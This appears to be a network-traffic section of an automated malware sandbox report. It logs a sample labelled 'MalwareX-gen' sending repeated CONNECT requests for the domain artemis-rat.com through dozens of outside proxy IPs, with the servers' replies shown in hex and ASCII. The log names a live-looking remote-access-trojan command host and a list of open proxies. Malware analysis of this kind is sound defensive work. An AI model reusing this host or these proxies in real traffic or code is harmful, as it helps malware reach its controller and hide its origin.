                                              X-Cache: MISS from ns547184.ip-139-99-148.net
                                              X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128
                                              Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f
                                              Data Ascii: <!DOCTYPE html PUBLIC "-/


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              296192.168.2.45067747.104.0.1290907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.225054979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.645654917 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              297192.168.2.450985185.162.228.128807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.229814053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.384089947 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              298192.168.2.450832103.118.46.17780807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.229945898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              299192.168.2.45092338.162.18.21631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.230199099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.643548965 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              300192.168.2.45092638.162.27.8331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.232935905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.647119999 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              301192.168.2.450907146.19.106.191123347284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.233731985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              302192.168.2.450839103.90.227.24431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.234158039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.975600004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.163244963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.367007971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.843678951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.523256063 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              303192.168.2.45085831.170.22.12710807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.235285997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              304192.168.2.45079546.209.54.11080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.236356974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.790952921 CET19INHTTP/1.1 200 OK
                                              Mar 11, 2024 08:39:31.045576096 CET202INHTTP/1.0 504 Gateway Timeout
                                              Content-Length: 735
                                              Content-Type: text/html
                                              Date: Sat, 02 Mar 2024 04:49:06 GMT
                                              Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                              Server: Mikrotik HttpProxy
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              305192.168.2.45089598.162.25.2341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.253009081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              306192.168.2.450987198.12.255.193227857284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.271308899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.788065910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              307192.168.2.45097338.162.20.7431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.272777081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.688155890 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              308192.168.2.45098823.19.244.10910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.283544064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              309192.168.2.450983162.243.102.20797647284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.291718960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              310192.168.2.45086815.207.35.24110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.295295000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.695862055 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              311192.168.2.45092193.190.141.102148887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.298038006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.592529058 CET226INHTTP/1.1 403 Forbidden
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Length: 101
                                              Content-Type: text/plain; charset=utf-8
                                              Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                              Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              312192.168.2.449988148.72.206.250140767284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.298069000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              313192.168.2.45090454.36.122.16297967284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.302788973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.944310904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              314192.168.2.450935149.210.235.10781187284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.303148985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.033596992 CET132INHTTP/1.1 503 Too many open connections
                                              Content-Type: text/plain
                                              Connection: close
                                              Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                              Data Ascii: Maximum number of open connections reached.


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              315192.168.2.450012170.81.131.7031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.310182095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.366328001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              316192.168.2.450979174.77.111.198495477284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.311932087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              317192.168.2.4509488.210.58.56807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.321322918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.135695934 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.23.4
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              318192.168.2.4500271.85.33.9466667284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.322429895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.366344929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.605912924 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              319192.168.2.45095158.234.116.197807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.327064991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.643985033 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              320192.168.2.45100538.162.29.21331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.331170082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.305078030 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              321192.168.2.450995174.75.211.22241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.335097075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              322192.168.2.45095888.99.138.2150887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.335438967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              323192.168.2.45005454.37.196.18980807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.335952997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.366358042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
